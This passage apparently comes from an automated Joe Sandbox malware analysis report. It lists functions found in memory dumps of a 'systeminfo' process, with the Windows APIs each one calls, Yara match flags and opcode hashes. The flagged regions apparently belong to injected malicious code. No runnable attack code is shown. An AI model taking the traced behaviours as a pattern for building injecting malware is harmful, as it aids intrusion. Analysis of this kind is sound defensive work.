                                                                                                                                                                                • Instruction Fuzzy Hash: E590026134140442F11071584814B460009CBE1305F56C025E1466574D8619DD526567
                                                                                                                                                                                Function 047A2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 28ba6ed0a9475d6940e0b2ffc245a7c7eca097c1f6bfb9028a34a6fbc2c0f399
                                                                                                                                                                                • Instruction ID: 8d9374ef5930bac99a8d1f80fcbbeb1fac37a6e74a2133f34b47105a935d8b6c
                                                                                                                                                                                • Opcode Fuzzy Hash: 28ba6ed0a9475d6940e0b2ffc245a7c7eca097c1f6bfb9028a34a6fbc2c0f399
                                                                                                                                                                                • Instruction Fuzzy Hash: 84900221211C0042F21075684C14B4700098BD0307F56C125A0556574CC915D9615962
                                                                                                                                                                                Function 047A2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 9cfb0dc34dd62e166723359775fadf5f4317d445eb7ee66e064160850ee5c7ee
                                                                                                                                                                                • Instruction ID: 04419d6d7d785ca121e3134a09c9678e07aeb2b42da6968585eaa1033ce19687
                                                                                                                                                                                • Opcode Fuzzy Hash: 9cfb0dc34dd62e166723359775fadf5f4317d445eb7ee66e064160850ee5c7ee
                                                                                                                                                                                • Instruction Fuzzy Hash: D890022160140042615071688C44A464009AFE1215756C131A0D9A570D8559D9655AA6
                                                                                                                                                                                Function 047A2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: a210c882bb535c36328824d2f5c115320547b7f53cd3181c448e2bba9506e77c
                                                                                                                                                                                • Instruction ID: 836c3f69176abfd25891b1b8c412e659d52d797835cb82880c26a93cdbc52cde
                                                                                                                                                                                • Opcode Fuzzy Hash: a210c882bb535c36328824d2f5c115320547b7f53cd3181c448e2bba9506e77c
                                                                                                                                                                                • Instruction Fuzzy Hash: 26900225221400022155B5580A0464B04499BD6355396C025F18175B0CC621D9655762
                                                                                                                                                                                Function 047A2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 151a30e52830e79080de82ef2456b6ca46530087d2ffe20d9675df8735697c9c
                                                                                                                                                                                • Instruction ID: 460f72e2ca66e802296a6fbde03d69cd6323d11d3471ef036a1940df498bacc3
                                                                                                                                                                                • Opcode Fuzzy Hash: 151a30e52830e79080de82ef2456b6ca46530087d2ffe20d9675df8735697c9c
                                                                                                                                                                                • Instruction Fuzzy Hash: E7900225211400032115B5580B04647004A8BD5355356C031F1417570CD621D9615562
                                                                                                                                                                                Function 047A2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 4d1532ff57b21335fc81b49430d903a15ae1b69bdf410a6ecbbe51e904dd138e
                                                                                                                                                                                • Instruction ID: 4c43658a33b9d4d547fdbe8ba14bac4dcf2b02527415f19357fea416a608f6d2
                                                                                                                                                                                • Opcode Fuzzy Hash: 4d1532ff57b21335fc81b49430d903a15ae1b69bdf410a6ecbbe51e904dd138e
                                                                                                                                                                                • Instruction Fuzzy Hash: 0090026120240003611571584814756400E8BE0205B56C031E14165B0DC525D9916566
                                                                                                                                                                                Function 047A2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 8549b6860994093ba38773caf6e8a584b5d9aa93da0a166a0babbe6eb24d503c
                                                                                                                                                                                • Instruction ID: 75cdb494227c1f0f394cc10853bb6c1b0a24a6307e5b0d3fb8ee724b0b7fdcd5
                                                                                                                                                                                • Opcode Fuzzy Hash: 8549b6860994093ba38773caf6e8a584b5d9aa93da0a166a0babbe6eb24d503c
                                                                                                                                                                                • Instruction Fuzzy Hash: 2390023120140802F1907158480478A00098BD1305F96C025A0427674DCA15DB597BE2
                                                                                                                                                                                Function 047A2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: aaaf0832db32a8241d5b8335ed458bbf95670ab8afb795616d9aa3d8dc36a9b7
                                                                                                                                                                                • Instruction ID: de0dcac93f9a0eacc906b627911d75b52703db91150013c81fbf038292e1e197
                                                                                                                                                                                • Opcode Fuzzy Hash: aaaf0832db32a8241d5b8335ed458bbf95670ab8afb795616d9aa3d8dc36a9b7
                                                                                                                                                                                • Instruction Fuzzy Hash: 6490023120544842F15071584804B8600198BD0309F56C021A04666B4D9625DE55BAA2
                                                                                                                                                                                Function 047A2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 0ae6f30adb821fb46f81d52227a6081004d3bcf84a9b7d1fd17e588b5c3cc743
                                                                                                                                                                                • Instruction ID: 6eab85f87fb44c75a463fc5f8b840899d455c1054db60f1ecb413a49109bff0d
                                                                                                                                                                                • Opcode Fuzzy Hash: 0ae6f30adb821fb46f81d52227a6081004d3bcf84a9b7d1fd17e588b5c3cc743
                                                                                                                                                                                • Instruction Fuzzy Hash: CD90023160540802F1607158481478600098BD0305F56C021A0426674D8755DB557AE2
                                                                                                                                                                                Function 047A35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: dcbc8c7b374b4686923100e68c6d81588b672d5f40a596b9a2f4a05769c32f8d
                                                                                                                                                                                • Instruction ID: 6f7d6a9bff54585819164f46e40bdf014b9c0383f1cfe0949e667be229b976de
                                                                                                                                                                                • Opcode Fuzzy Hash: dcbc8c7b374b4686923100e68c6d81588b672d5f40a596b9a2f4a05769c32f8d
                                                                                                                                                                                • Instruction Fuzzy Hash: 7590023160550402F1107158491474610098BD0205F66C421A0826578D8795DA5169E3
                                                                                                                                                                                Function 047A39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 60175b81f003a9db247b9d76eda25eb1e1fcb40f5ad1bd03a66dd38ea480490b
                                                                                                                                                                                • Instruction ID: 2ee56e7e93b04e0b7aae1b06523771db29d5e1b7e14a7a662176e14eabac1e52
                                                                                                                                                                                • Opcode Fuzzy Hash: 60175b81f003a9db247b9d76eda25eb1e1fcb40f5ad1bd03a66dd38ea480490b
                                                                                                                                                                                • Instruction Fuzzy Hash: E390022124545102F160715C48047564009ABE0205F56C031A0C165B4D8555D9556662
                                                                                                                                                                                Function 00573A00 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • Sleep.KERNELBASE(000007D0), ref: 00573ACB
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                • String ID: net.dll$wininet.dll
                                                                                                                                                                                • API String ID: 3472027048-1269752229
                                                                                                                                                                                • Opcode ID: 80d47f1b2770dc425ad21ff3b2b8c099e80828185e69961d6a7c7ff01649011a
                                                                                                                                                                                • Instruction ID: 4634ea97fd0d72e164b13da1924b3eccad53c68f26100da3b14afdb5cd450456
                                                                                                                                                                                • Opcode Fuzzy Hash: 80d47f1b2770dc425ad21ff3b2b8c099e80828185e69961d6a7c7ff01649011a
                                                                                                                                                                                • Instruction Fuzzy Hash: 54318DB1A00705BBD714DFA4D885FEBBBB8FB88710F04851CF50DAB280D670AA40DBA5
                                                                                                                                                                                Function 0056F419 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeUninitialize
                                                                                                                                                                                • String ID: @J7<
                                                                                                                                                                                • API String ID: 3442037557-2016760708
                                                                                                                                                                                • Opcode ID: 3eed757c82b350cd0f476bf0c112fd5c30552d895563b313076209cbed693cae
                                                                                                                                                                                • Instruction ID: 86ebe732e59422e0753a81ea49984157a5bac897aa341f44dad8aa7d152bc4b0
                                                                                                                                                                                • Opcode Fuzzy Hash: 3eed757c82b350cd0f476bf0c112fd5c30552d895563b313076209cbed693cae
                                                                                                                                                                                • Instruction Fuzzy Hash: 97313275A0060AAFDB00DFD8D8809EFB7B9FF88304B108569E505EB215DB75EE458BA0
                                                                                                                                                                                Function 0056F420 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeUninitialize
                                                                                                                                                                                • String ID: @J7<
                                                                                                                                                                                • API String ID: 3442037557-2016760708
                                                                                                                                                                                • Opcode ID: 8ffd90070cdc1e7f8cd57d78baf7dcb8e0b4920d9ef59d7c5bfffd09d8624f5d
                                                                                                                                                                                • Instruction ID: d83990a6f90d59c58929e7234e2a59077f9ade43d7011c2a377740b838bf2bce
                                                                                                                                                                                • Opcode Fuzzy Hash: 8ffd90070cdc1e7f8cd57d78baf7dcb8e0b4920d9ef59d7c5bfffd09d8624f5d
                                                                                                                                                                                • Instruction Fuzzy Hash: 8B3112B5A0060AAFDB00DFD8D8809EFB7B9FF88304B108559E515EB214D775EE458BA0
                                                                                                                                                                                Function 00579650 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0057968C
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                • String ID: D2V
                                                                                                                                                                                • API String ID: 3298025750-3886701758
                                                                                                                                                                                • Opcode ID: c715db85d53a13bf2703d1e84f2e01fd539ab5599b816f7cf02fb243ce824c2a
                                                                                                                                                                                • Instruction ID: 02bb10722d86ebc0c65accf0c06fe20a693e235e48a864fa66fd0f5a3bd9795d
                                                                                                                                                                                • Opcode Fuzzy Hash: c715db85d53a13bf2703d1e84f2e01fd539ab5599b816f7cf02fb243ce824c2a
                                                                                                                                                                                • Instruction Fuzzy Hash: BCE06D752002047BCA14EE58EC45FEB77ADEFC5710F004409F908A7241D670B81087B9
                                                                                                                                                                                Function 00579600 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • RtlAllocateHeap.NTDLL(005619D6,?,2VW,005619D6,005755DE,00575632,?,005619D6,005755DE,00001000,?,?,00000000), ref: 0057963F
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                • String ID: 2VW
                                                                                                                                                                                • API String ID: 1279760036-3242251881
                                                                                                                                                                                • Opcode ID: 28b77bc20edb0a168c07d26e1778ebc3a076a00a9a0fa9a8c42f3da64252722e
                                                                                                                                                                                • Instruction ID: aa801a14c9aeecbd6dee541b782c636aa99901f81a9cca3ee2c1d94a699598a7
                                                                                                                                                                                • Opcode Fuzzy Hash: 28b77bc20edb0a168c07d26e1778ebc3a076a00a9a0fa9a8c42f3da64252722e
                                                                                                                                                                                • Instruction Fuzzy Hash: 85E06D722002047FDA10EE99DC45FAB37ADEFC9710F004409F908A7241DA70B8108BB6
                                                                                                                                                                                Function 00564490 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00564502
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Load
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                                                                • Opcode ID: 2acb059c442e8cdeca4d48adca3ecf7414906d67dbbe2b9188f97ec82255bcc6
                                                                                                                                                                                • Instruction ID: 9257602fc6b5127663a0bb1ae302f997a605098bb1eeac2080cf9c911e576ff5
                                                                                                                                                                                • Opcode Fuzzy Hash: 2acb059c442e8cdeca4d48adca3ecf7414906d67dbbe2b9188f97ec82255bcc6
                                                                                                                                                                                • Instruction Fuzzy Hash: 220121B5D0020EABDF10EBE4EC46F9DBBB8AB54708F008195E90C97241FA31EB54DB91
                                                                                                                                                                                Function 005796E0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,0056824E,00000010,00000000,?,?,00000044,00000000,00000010,0056824E,?,?,00000000), ref: 00579743
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateInternalProcess
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2186235152-0
                                                                                                                                                                                • Opcode ID: 1d5a6ef5cefb707d6e3b8089309946eeb11cda7af8fecea57334ea16c418b43c
                                                                                                                                                                                • Instruction ID: 308f80d27042015627ef632aafff78335617090db3d91969674b6d48a9c819e6
                                                                                                                                                                                • Opcode Fuzzy Hash: 1d5a6ef5cefb707d6e3b8089309946eeb11cda7af8fecea57334ea16c418b43c
                                                                                                                                                                                • Instruction Fuzzy Hash: B301C0B2200208BFCB04DE89DC81EEB77ADAF8D754F118118BA09E3240D630F8518BA5
                                                                                                                                                                                Function 00559DC0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00559E05
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                                                                • Opcode ID: 1e5321eddc2394ef7b2a18b5bbe636268aec256c6cd5df096917e63356e8c97a
                                                                                                                                                                                • Instruction ID: f7f87ae961678aeb6ebe556dbc1fbdc4e2088ab1f9002de2aa397c0aa5528e44
                                                                                                                                                                                • Opcode Fuzzy Hash: 1e5321eddc2394ef7b2a18b5bbe636268aec256c6cd5df096917e63356e8c97a
                                                                                                                                                                                • Instruction Fuzzy Hash: 7CF0653338070476D72065A9AC03FE77A4CEBC1B61F14042AFB0DDB1C1D995B41142A9
                                                                                                                                                                                Function 00559DBD Relevance: 1.5, APIs: 1, Instructions: 33threadCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00559E05
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                                                                • Opcode ID: a44f9d19775917f59132dc6f471127b2b76d2a48a33fe2762b78f6f89db886ce
                                                                                                                                                                                • Instruction ID: 336e19060ab2e3949ade051ae22785651696358c1807609a7b3ed38fa9b5211d
                                                                                                                                                                                • Opcode Fuzzy Hash: a44f9d19775917f59132dc6f471127b2b76d2a48a33fe2762b78f6f89db886ce
                                                                                                                                                                                • Instruction Fuzzy Hash: 9DE0D83338070476D63061A99D03FE76A4CAFC1F51F19441DFB0DBB2C1DAA5B80482A9
                                                                                                                                                                                Function 00568290 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 005682BC
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                • Opcode ID: 3e3830f0d9de34877d6964a08f29d77a9167c369ed1ef0c375e208d959920254
                                                                                                                                                                                • Instruction ID: 1d4e5621a5c64f17973d5d286746a500023238f1764ba8b79ac86ce84afd4c8e
                                                                                                                                                                                • Opcode Fuzzy Hash: 3e3830f0d9de34877d6964a08f29d77a9167c369ed1ef0c375e208d959920254
                                                                                                                                                                                • Instruction Fuzzy Hash: D6E026393007082BEB20AAB8DC47F723348BB48720F184B60BC5DCB2C1E938F8018254
                                                                                                                                                                                Function 00568077 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,00561CC0,00577F1E,005755DE,00561C8D), ref: 005680B3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
